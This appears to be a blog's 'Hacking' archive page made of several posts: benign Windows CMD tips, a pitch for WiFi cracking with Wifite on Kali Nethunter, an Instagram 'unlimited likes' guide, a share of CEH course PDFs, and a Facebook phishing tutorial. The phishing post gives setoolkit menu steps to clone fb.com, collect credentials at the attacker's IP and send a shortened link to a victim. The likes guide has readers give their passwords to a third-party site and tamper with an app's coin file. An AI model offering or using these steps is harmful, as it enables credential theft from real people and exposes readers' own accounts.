Articles by "Hacking"
Showing posts with label Hacking. Show all posts
Droidadda is one of worlds best online blogging portal where latest trending articles on Android,Blogging,Seo,Gadgets,Tricks,etc are daily published.

Introduction

Today, we use computer almost in every field. Computer is also combination and hardware and software. Most basic software that is necessary to run a computer is operating system. Mostly people use Microsoft Windows operating system. Windows is rather a powerful GUI based operating system which is easy to operate. We can install different application software’s on windows according to our need including MS office, Adobe reader, music players, games and notepad. As we can use notepad for multiple task like coding editor, dairy and etc for more you need to check all notepad tips and tricks. But an average users who have basic knowledge of computer don’t know all options of windows. Some task in Windows is very difficult like get IP address of a system, resolve Domain name to IP address, know active internet connection etc. But in DOS operating system, with the help one command we can do these task. Dos is the first command based Microsoft operating system. We can do many task in an easy way with the help of Dos but we only need to know about these commands. If you do not know about these command then this article is for you. In this article we provide you a list of best CMD tricks and hacks.

List of Best CMD Tricks

1. Creating Con Or Non Deletable Folder With CMD.

In Windows you can not create a folder with name con or can not rename a folder to con. This is because it is a variable name used by Windows programming. Other variable name includes lp1, lpt2, lpt3 up to lpt9, aux. So Windows can not allow you to make a folder with this name. But with the help of dos command we can create a folder with such name. So here how to implement this amazing cmd trick.
  • Press Windows button and run CMD as administrator.
  • Type the command with this syntax “drive name: “. This command allow you to enter in the drive in which you want to create a folder. For example d: and press enter.
  • Now enter the following command.
md con and press enter.
  • After that your folder is created in specified drive.


Deleting con Folder.
You can not delete such folder manually by using Windows. To delete this folder type the following command in the command prompt.
rd con
Also Read: How To Fix Error 651 in Windows 7/8/10 [8 Methods]

2. Shut Down Computer With Commands.

Best in all other cmd tricks and hacks. You can also shut down your computer by using command prompt. Type the following command in command prompt.
  • For Shut Down
shutdown -s
  • For Restarting
shutdown -r
  • For Logoff
shutdown -l
Note: -s -r -l parameter tells the computer to shut down, restart, log off

3. Shutdown Computer In Specified Time With CMD.

You can also shut down your computer in specified time using command prompt. If you want to shut down your computer after two minutes type the following command.
shutdown -s -t 120


4. Print Message Before Shut Down.

We can also print some message before shut down a computer. Some users can use it as a reminder which remind you a task at the time of shut down. We can do this by using the following command.
shutdown -s -t 500 -c “My message.”
We can replace my message with our message we want to display.

5. Assoc CMD Command.

There are many programs installed in our computer. Each program has its own file extension. It is difficult to remember each file extension. If you want to know which file is associated with which program then we can do this by typing the following command
Assoc
This command provide you a list of programs and their associated files.

6. Hide A Folder With CMD Command.

We can play some interesting tricks with command prompt. Hiding a folder is one of them. By hiding a folder you can also save your data from other users. You can do this by typing the following command.
attrib +s +h D:ABC
Where ABC is the name of directory we want to hide.



Also Read: Windows Repair v3.9.17 Pro Portable is Here!

Unhide The Folder.

If we can also unhide the hidden folder using command prompt. To unhide the folder type the following command.
attrib -s -h D:ABC

7. IP Related CMD Command.

ipconfig is of the most useful command to see the IP address, Defult gateway and subnet mask. This command is related to networking and is most important for troubleshooting the problems related to TCP/IP.
  • To view Subnet Mask and IP Address use.
ipconfig
  • To view TCP/IP related Information use.
ipconfig/all
  • To view DNS cache use.
ipconfig/displaydns
  • To delete the local cache of DNS use.
ipconfig/flushdns

8. Net Related Commands.

Net is a powerful cmd tool which is used to see the stat of network. This command provide information about active connection. This command is used to view or update network settings.

It is used to view only the services that are started using the following versions of this command
  1. net stop server ( when the server is currently not running any service).
  2. net start server (when the server is being starting a service).
  3. net start (This command is used to check the services that are currently running).
  4. For connecting to shared network devices use the following command:
  • net use m:sharedservername (for connecting to share network drives).
  • net use m:sharedservername/delete (for disconnecting to share network drives).

9. Netstat CMD Command.

Netstat command is an important tool when you want to know about who is establishing a connection with your computer. The output of this command provides you the information about all active connection and listening ports. we can view Ethernet statics and resolve connecting host IP address to a fully qualified domain name. You can use the Netstat command with following attributes :
  1. -a (display all connection).
  2. -n (sorts connection in numerical order).
  3. -b (display executable name. that is browser name).

10. Nslookup CMD Command.

When we use internet , Domain name server resolve the Domain names to IP addresses so we do not need to remember the IP addresses. But in case of troubleshooting we can rather get the IP address of particular website using this command.
Hence, the syntax is nslookup google.com

11. Get a List Of PC Drivers.

Another amazing in all cmd tricks by using it we can get a complete list of all drivers installed on your PC along with their details. Just type “driverquery” in the Command Prompt and press Enter to see list of all drivers installed on your PC along with their details.

12. Command Prompt Color Change.

We have seen Command Prompt with a black screen and white font since forever. Because it is the default theme. What most users do not know is that colors in command prompt can be easily changed. So here most wanted in all CMD tricks. To do so, right-click at the top corners of Command Prompt, then select “Properties” from the menu. In the properties, click on “Colors” tab and you will find all the options to change color of both text and background.

13. Star Wars IV Trick.

In this non productive yet awesome trick, we will tell you how to watch star wars. Well it won’t be an HD version but the ASCII coded movie is still very enjoyable. To watch the movie, open Command Prompt, then enter this command “telnet towel.blinkenlights.nl” and hit Enter. Make sure you have telnet enabled on your PC. to know more, click here.

14. Create Your Own WiFi Hotspot.

Due to android phones, we are used to using Wifi hotspots. therefore , we can create a Wifi hotspot using our laptop or PC with this simple CMD trick. You can rather use this trick to share your wireless dongle internet connection with other devices.

Enter the following command to enable Wi-Fi Hotspot.
netsh wlan set hostednetwork mode=allow ssid=Hotspotname key=password
Then, to start Hotspot, enter :
netsh wlan start hostednetwork
As well as to stop hotspot, enter :
netsh wlan stop hostednetwork

Watch YouTube Videos On CMD Tricks


Also Read These Stories:

Final Words

In conclusion, these are some best cmd tricks and hacks. We hope you like them all and find them working. In case you still face any problem or you know cmd tricks which are missing let us know and we will update it. For more related articles in future please subscribe us now !
Droidadda is one of worlds best online blogging portal where latest trending articles on Android,Blogging,Seo,Gadgets,Tricks,etc are daily published.





WiFi Hacking With KALI Nethunter

NEW Blog / Shop about KALI Nethunter just started. You can find it here
In the former articles we showed you how to hack different WiFi protocols. We broke WEP & WPS so far, since here we get the biggest chances of success. But being a WiFi Hacker isn’t an easy job when you have to run around with a Laptop! This articles shows you how to run Wifite on KALI Nethunter, a special edition of KALI Linux running on Android Phones and Tablets!

Must Read : Kali Nethunter For Mediatek Devices MT6582 MT6592

KALI Nethunter

The Homebase of KALI Nethunter is, of course, at Offensive Security. The KALI Nethunter is completely free. No costs, no fees, just download it! You can find the Landing Page to KALI Nethunter right here

KALI Nethunter, Wifi Hacking
It now supports the Mediatek mobile devices.This has been one of the biggest build for Mediatek Development platform.

Next, you need an Y-Adapter for your chosen hacking device. We want to do some serious Wifi Hacking. You will also find that one on Amazon:

Y-Adapter Nexus
 
Next, you need a powerful WiFi Adapter to conduct the WiFi Hacks. A must have for serious WiFi Hacking.

List of Wifi Adapter For Android on Amazon

 Here’s the best model i have ever found:
 
ALFA AWUS036H
 
Basically now you are done.
Next Steps:

  • Install KALI Nethunter on your Android
  • Use the Y-Adapter to plugin the ALFA WiFi Unit
  • Run Wifite to hack some WiFi Networks
All information about how to hack the different WiFi Type you will find at this Blog. My tutorials cover:

 Video Tutorials:



 

Final Words: 

Before trying anything you have to recerch it once. As Kali NetHunter requires Linux Programming Skills. So you have to atleast know or  learn about linux programming in order to crack WiFi's. 
Thank you for reading this post carefully !  
Droidadda is one of worlds best online blogging portal where latest trending articles on Android,Blogging,Seo,Gadgets,Tricks,etc are daily published.

Unlimited Likes On Instagram

Hello Friends! You might be knowing about the popular social media application called as Instagram. Instagram is the social networking site which allows users to chat with their friends and it is only for sharing images with your buddies. Also, check out Latest Android Tricks Every User Should KnowIf you are sharing the images, so you need followers to get the likes on the Instagram, which is a bit tough to get the likes on your pictures because you need more followers to get more likes on your photos.


In today’s article, I am going to tell you about the application which will allow you to get the auto likes on your images which you have uploaded to Instagram this app works in both rooted and as well as non-rooted mobile phone. You may also like Highest Paying Free Recharge Apps For Android If you have the rooted mobile phone so you can also get the unlimited likes from this application. I will be teaching you how to do that easily by doing the below-given trick.


images (1)

How To Get Unlimited Likes On Instagram [Working]


Application method was not working for anyone. Today, I found a new website which will be working fine if you want to get unlimited likes on Instagram.
I tested this site, and it was working fine. There are some issues which the site is having which I will be telling you below.
The name of the website is Hublagram. In which you need to login into that site using Login ID and password and from that site you will be asked to enter the details.
If you enter your details, you might follow the peoples whom you don’t know. They will access your account. They won’t be able to read your messages then it’s up to you.
You can get unlimited followers and likes from the application. In once you can get up to 20 followers, and I have personally tried this site, and it worked fine for me.

Advantages:


  • Unlimited Followers.
  • Unlimited Likes.
  • Unlimited Comments.
  • Mobile responsive site.

Disadvantages:


  • Sometimes there is an error while signing in to the site
  • You need to wait for 30 mins after getting the followers and likes.
  • You will automatically follow anyone whom you don’t know personally.

This site is having a simple policy of Giving and Take. In which you need followers then you need to follow someone. This will be done automatically. You need to keep your account clear. Let’s see how to sign up
Unlimited likes on instagram

How To Get Unlimited Likes On Instagram (Website)


  • Firstly visit the Hublaagram website from here: Hublaagram
  • There you will see an option to login and just enter your username and password and now click on login.
Unlimited likes on instagram

  • The login will be failed there you will see an option of incorrect login and now open Instagram, and there you will see a suspicious activity symbol just click on it was you.
Unlimited likes on instagram

  • Then just click on setting and switch off your private account if your account is private.
Unlimited likes on instagram

  • Now, try logging in again, enter your details again and then you will see a captcha just enter it, and you are on the login screen.
  • You are almost there you will see some options to get unlimited likes, comments, follows and then you are done click on it and select any image of your choice, and you can gain unlimited likes on your Instagram.

Note: This trick is for Educational Purpose Only. We are not responsible if you lose your account or anything wrong happens with your account 

How To Get Unlimited Likes On Instagram [Working]


There is an application named as Instalikes which works on both the phone such as rooted and as well as the non-rooted mobile phone. As I said above that if you are having rooted then you can gain unlimited likes. This application works on the basis of coins if you like someone else photos or image uploaded by them then you will also get the likes on Instagram. We have also shared about Get Auto Followers On Instagram If you will click on the advertisement then you will get some coins so by spending those coins you can get the likes on your picture. I have tried this application many times and it worked fine. But this is having some issues too that if you will use this application to get more and more likes your account may get blocked and you have to unblock by going on forgot password which I will be telling you below the procedure. We have also shared Root Your Android Mobile Easily Without PC  In which we have shared about how to flash custom ROM and kernels.
This application is not available on play store you have to download this application from the given below link you can download the application with this we will be mentioning trick In which you all get benefits for rooted and as well as non-rooted devices. You may also like How To Install Dolby Atmos On Your Android Device. Here the most important thing is patience if you don’t have Patience then there are less chance that you will get more likes or your account may also blocked so patience plays an important role here.

Advantages:


  • You can get unlimited likes by following this tutorial
  • Application speed of getting coin is super fast
  • Whenever you get one ad then you will get 20+ coins

Disadvantage:


  • Your account might get blocked by getting more likes

Warning:
We are not responsible if you account got blocked by Instagram

Requirements:


  • Real followers App – Download
  • (Root) CheatDroid – Download
  • (Root) BusyBox – Download
  • Instagram App – Download
  • Instagram account which is email verified (Important)
  • Patience



How To Get Unlimited Likes From Instagram. (Non-Rooted Users)[Working Now]


  • Firstly Install the Install the Real Follower app from the above-given link
  • Now, log in with your Instagram account

  • Now on the main screen, you will see some profiles picture just click on LIKE

Auto Likes on Instagram

  • Now whenever you will like photos of the app you will get likes
  • After successfully getting likes on photos click on the “Get Likes”
  • Choose any photo which ever you want likes in it. Select it and select the coins how many likes you want at your picture

Select likes on photo

  • Now, you are done you will get likes on your photos soon.



How To Get Unlimited Likes From Instagram. (Rooted Users) [Not Working]

You have to do all the above process and to increase the coin on your picture you have to do below steps to get unlimited coins on your picture

  • Install BusyBox application from the above requirement

BusyBox Binary install

  • Click on install and the binaries will be installed in your device
  • Now Install CheatDroid Application and open it
  • Click on the search button and search for InstaLikes application from the list

Search InstaLikes

  • Select InstaLikes and now you will see some .XML files in there
  • Now in the list you have to search UserPoint.XML like given in below screenshot

Selecting Userpoints.xml

  • Now, increase the value of the coins to 2000 don’t increase too much or else app will get crashed

Autolikes on insta

  • Now, open the InstaLikes and you will see 2000 coins in your account.

Coin value changed

  • You can get likes in your pic and enjoy this great trick



My account has been blocked. Now, what should I do?


  • Now, in the main screen you will be getting an option called as Forgot Your Login Details? Get Help Signing in.

Forgot password of instagram

  • Now, open it and select Use Username or Email

Select user name and password

  • Enter your email address or your username in there and you will get an email

Instagram email verified

  • Check your mail and update the password of your account
  • You are all done

Final Words:


This way you can get unlimited likes on your pic and enjoy getting unlimited likes this was the tutorial for rooted and as well as for Non-Rooted device. If you love this tutorial so click on share button and share it with your friends. Thank you for visiting and keep visiting for more tips and tricks like this and peace out.
Droidadda is one of worlds best online blogging portal where latest trending articles on Android,Blogging,Seo,Gadgets,Tricks,etc are daily published.








In this article, i shared Best Tutorial For Hacking & Learning for most popular hackers certification – Certified Ethical Hacker course. In this article i want to share latest CEH PDF educational materials (modules). CEH v9 is currently latest course for certified ethical hacker. To beat a hacker, you need to think like a hacker” – this is qoute which I like to say when they ask me why I use same tools as black hat hackers use.

I would also like to note that i didn’t uploaded these modules online and for any DCMA complain please contact uploaders. We just share it.
You can download PDF modules for CEH v9 from the link given below, where you will find folder called “CEH_V9” containing all PDFs from Certified Ethical Hacker course v9. Enjoy and happy hacking.

Download:
CEH V8 PDF

Source:
The Next Hack
Droidadda is one of worlds best online blogging portal where latest trending articles on Android,Blogging,Seo,Gadgets,Tricks,etc are daily published.

Do you know ,you can hack facebook password with one fake fb page(phishing).
In this tutorial we will use Social Engineering tool i.e Credential Harvester attack in kali linux.
All you need to do is follow the tutorial as it is to see the Credentials Harvester into the action.


WHAT IS CREDENTIALS HARVESTER ATTACK ?


It is a part of SOCIAL ENGINEERING TOOLKIT. In this method the attack started with a creation of phishing page. Attacker set the post back ip address to receive the credentials like usernames and passwords. The attacker can shorten the ip address to make the ip address looks like a genuine url. When the victim visits the url and feed the login details, the post back feature of the page will send all the data to attacker.

Follow this video……….

https://youtu.be/6OtpkQXYmK4

 CREDITS:
 HARVESTER ATTACK
 The Next Hack

STEPS:

1. Boot up kali linux on your machine and open terminal.

2. Type this command in the kali linux terminal.
                    root@kali~# setoolkit

3. Enter ‘y’ to agree the social engineering toolkit terms and conditions.

4. Select the following options one by one from the menu

                ‘1’ (Social Engineering Attacks) then

                ‘2’(Website Attack Vectors) then

                ‘3’(Credential Harvester Attack) then

5. Type ‘2’ (Site cloner)

          set:webattack> IP address for the post back in harvesting:192.168.x.xxx (your ip address)

          set:webattack>Enter the url to clone: www.fb.com

6. Go to  Places > Computer > VAR > WWW and move all the files from www folder to html folder.
7.  Shorten your ip address with tinyurl.com and send it to the victim. When the victim open the link and enter the login details , you will get the username and password in a harvester text file which is located at Places > Computer > VAR > WWW.
 
Back To Top